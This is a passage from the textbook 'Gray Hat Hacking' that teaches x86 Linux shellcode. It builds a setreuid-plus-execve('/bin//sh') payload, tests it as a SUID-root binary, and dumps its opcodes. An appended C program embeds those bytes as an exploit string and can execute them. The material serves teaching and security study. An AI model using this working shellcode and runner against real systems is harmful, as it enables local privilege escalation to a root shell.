
Shon Harris, Allen Harper, Chris Eagle, and Jonathan Ness

"Gray Hat Hacking, Second Edition"

Finally, /bin is pushed onto the stack. At this point, we have everything we need on the
stack, so esp now points to the start of the string /bin//sh (the doubled slash pads the
path to exactly eight bytes so that it can be pushed as two dwords with no NULL byte inside
it; execve treats it the same as /bin/sh). The rest is simply an elegant use of the stack
and register values to set up the arguments of the execve system call: ebx receives the
address of the path, ecx the address of the argv array built on the stack, and edx is
zeroed for a NULL envp.
Assemble, Link, and Test
Let's check our shellcode by assembling with nasm, linking with ld, making the program
SUID root, and then executing it:
$ nasm -f elf sc2.asm
$ ld -o sc2 sc2.o
$ sudo chown root sc2
$ sudo chmod +s sc2
$ ./sc2
sh-2.05b# exit
Wow! It worked!
Extracting the Hex Opcodes (Shellcode)
Remember, to use our new program within an exploit, we need to place our program
inside a string. To obtain the hex opcodes, we simply use the objdump tool with the -d
flag for disassembly:
Gray Hat Hacking: The Ethical Hacker's Handbook, page 218
$ objdump -d ./sc2
./sc2: file format elf32-i386
Disassembly of section .text:
08048080 <_start>:
8048080: 31 c0 xor %eax,%eax
8048082: b0 46 mov $0x46,%al
8048084: 31 db xor %ebx,%ebx
8048086: 31 c9 xor %ecx,%ecx
8048088: cd 80 int $0x80
804808a: 31 c0 xor %eax,%eax
804808c: 50 push %eax
804808d: 68 2f 2f 73 68 push $0x68732f2f
8048092: 68 2f 62 69 6e push $0x6e69622f
8048097: 89 e3 mov %esp,%ebx
8048099: 50 push %eax
804809a: 53 push %ebx
804809b: 89 e1 mov %esp,%ecx
804809d: 31 d2 xor %edx,%edx
804809f: b0 0b mov $0xb,%al
80480a1: cd 80 int $0x80
$
The most important thing about this printout is to verify that no NULL characters
(\x00) are present in the hex opcodes. A NULL byte would terminate the string when a
function such as strcpy copies it into the vulnerable buffer, truncating the shellcode.
This is why the code zeroes eax with xor and then loads the system call number into al:
a plain mov $0x46,%eax would encode as b8 46 00 00 00 and put three NULLs into the payload.
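The NULL check described above, and the string form the opcodes have to end up in, as an added example (this is not the book's code): a small C tester that embeds the 35 bytes from the objdump listing, renders them as the "\x.." string an exploit would carry, reports the offset of any NULL byte, and, when built with gcc -m32 on 32-bit Linux and started with --run, executes them from an anonymous RWX mapping. The function names, the --run flag and the constructed mov $0x46,%eax counter-example are this example's own choices, not from the page.

```c
/* Added example (not from the book): a tester for the 35 opcode bytes that
 * objdump printed for sc2. It renders them as the "\x.." string an exploit
 * embeds, checks for NULL bytes, and on 32-bit Linux (gcc -m32, run with
 * --run) executes them from an anonymous RWX mapping. Function names and
 * the --run flag are this example's own choices. */
#define _GNU_SOURCE
#include <stdio.h>
#include <stddef.h>
#include <string.h>

/* The opcodes from the objdump listing above, in order. */
static const unsigned char sc2[] = {
    0x31, 0xc0,                    /* xor  %eax,%eax                      */
    0xb0, 0x46,                    /* mov  $0x46,%al    setreuid(0, 0)    */
    0x31, 0xdb,                    /* xor  %ebx,%ebx                      */
    0x31, 0xc9,                    /* xor  %ecx,%ecx                      */
    0xcd, 0x80,                    /* int  $0x80                          */
    0x31, 0xc0,                    /* xor  %eax,%eax                      */
    0x50,                          /* push %eax         string terminator */
    0x68, 0x2f, 0x2f, 0x73, 0x68,  /* push $0x68732f2f  "//sh"            */
    0x68, 0x2f, 0x62, 0x69, 0x6e,  /* push $0x6e69622f  "/bin"            */
    0x89, 0xe3,                    /* mov  %esp,%ebx    ebx = "/bin//sh"  */
    0x50,                          /* push %eax         argv[1] = NULL    */
    0x53,                          /* push %ebx         argv[0] = path    */
    0x89, 0xe1,                    /* mov  %esp,%ecx    ecx = argv        */
    0x31, 0xd2,                    /* xor  %edx,%edx    edx = envp = NULL */
    0xb0, 0x0b,                    /* mov  $0xb,%al     execve            */
    0xcd, 0x80                     /* int  $0x80                          */
};
#define SC2_LEN (sizeof sc2)

/* Constructed counter-example: a plain "mov $0x46,%eax" encodes as
 * b8 46 00 00 00, three NULLs, which is why sc2 zeroes eax and loads al. */
static const unsigned char naive_mov_eax[] = { 0xb8, 0x46, 0x00, 0x00, 0x00 };

/* Index of the first NULL byte, or len if there is none. A NULL ends the
 * string when strcpy() copies it into the target buffer, so everything
 * after it is lost. */
size_t first_null(const unsigned char *code, size_t len)
{
    for (size_t i = 0; i < len; i++)
        if (code[i] == 0x00)
            return i;
    return len;
}

/* Write the bytes as "\x31\xc0..." into out (needs 4*len + 1 bytes).
 * Returns the number of characters written, 0 if out is too small. */
size_t to_c_string(const unsigned char *code, size_t len, char *out, size_t outsz)
{
    if (outsz < 4 * len + 1)
        return 0;
    for (size_t i = 0; i < len; i++)
        sprintf(out + 4 * i, "\\x%02x", code[i]);
    return 4 * len;
}

/* Convenience wrapper returning sc2 as a string literal body. */
const char *sc2_as_c_string(void)
{
    static char buf[4 * sizeof sc2 + 1];
    to_c_string(sc2, sizeof sc2, buf, sizeof buf);
    return buf;
}

#if defined(__linux__) && defined(__i386__)
#include <sys/mman.h>
/* Copy the shellcode into an executable page and call it. Compiled only
 * for 32-bit Linux: the code relies on 32-bit pushes and int 0x80. */
static void run_shellcode(const unsigned char *code, size_t len)
{
    void *page = mmap(NULL, len, PROT_READ | PROT_WRITE | PROT_EXEC,
                      MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (page == MAP_FAILED) {
        perror("mmap");
        return;
    }
    memcpy(page, code, len);
    ((void (*)(void))page)();      /* does not return if execve succeeds */
}
#endif

int main(int argc, char **argv)
{
    size_t bad = first_null(sc2, SC2_LEN);
    printf("char shellcode[] = \"%s\";  /* %zu bytes */\n",
           sc2_as_c_string(), SC2_LEN);
    if (bad != SC2_LEN) {
        printf("NULL byte at offset %zu: the payload would be truncated\n", bad);
        return 1;
    }
    puts("no NULL bytes");
#if defined(__linux__) && defined(__i386__)
    if (argc > 1 && strcmp(argv[1], "--run") == 0)
        run_shellcode(sc2, SC2_LEN);
#else
    (void)argc; (void)argv;
#endif
    return 0;
}
```

Run without arguments on any host to get the pasteable string and the NULL check; the --run path is compiled in only for an i386 Linux build, because the 32-bit pushes and int 0x80 would not behave the same on a 64-bit process. Feeding naive_mov_eax to first_null shows the truncation problem the book's xor/mov-al idiom avoids.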

